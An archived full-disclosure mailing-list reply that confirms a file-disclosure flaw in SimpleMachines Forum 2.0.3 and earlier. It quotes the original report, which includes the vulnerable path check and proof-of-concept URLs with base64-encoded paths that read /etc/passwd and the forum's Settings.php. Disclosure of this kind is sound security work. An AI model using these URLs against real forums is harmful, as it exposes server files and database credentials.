[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <50EC1E25.1080806@igalia.com>
Date: Tue, 08 Jan 2013 14:24:53 +0100
From: Carlos Alberto Lopez Perez <clopez@...lia.com>
To: WHK Yan <yan.uniko.102@...il.com>
Cc: vuln@...unia.com, submissions@...ketstormsecurity.com,
submit@...ecurity.com, full-disclosure@...ts.grok.org.uk,
mr.inj3ct0r@...il.com, vuldb@...urityfocus.com,
oss-security@...ts.openwall.com
Subject: Re: File Disclosure in SimpleMachines Forum <=
2.0.3
On 07/01/13 15:54, WHK Yan wrote:
> *Summary:*
> --------------
> A security flaw allows an attacker to know the full source file of the web
> system.
>
> *Details:
> -----------
> Sources/ManageErrors.php Line 340:
> // Make sure the file we are looking for is one they are allowed to look at
> if (!is_readable($file) || (strpos($file, '../') !== false && (
> strpos($file, $boarddir) === false || strpos($file, $sourcedir) === false)))
> fatal_lang_error('error_bad_file', true,
> array(htmlspecialchars($file)));
>
> Bypass function strpos($file, '../'), no need "../", example:
> /home/foo/www/Settings.php
>
> *PoC:
> -------
> http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q=
> Read /etc/passwd
>
> works with path disclosure for read Settings.php:
> http://whk.drawcoders.net/index.php/topic,2792.0.html
>
> *Reproduce:
> 1. Open http://example.com/forumpath/SSI.php?ssi_function=fetchPosts
> 2. Get full path of web app ( /home/1337/public_html/SSI.php ).
> 3. Exploit in base64:
> http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2hvbWUvc3BhZG1pbi9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHA=
> To read /home/spadmin/public_html/Settings.php
>
> Referer and Mirror:
> -------------------------
> http://whk.drawcoders.net/index.php/topic,2805.0.html
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Hi!
I have verified SMF is affected by this issue.
The PoC requires an admin login to be exploited. Is there any
possibility to exploit this issue without an admin login?
I guess a CVE should be assigned. Do you already asked for one?
Download attachment "signature.asc" of type "application/pgp-signature" (901 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists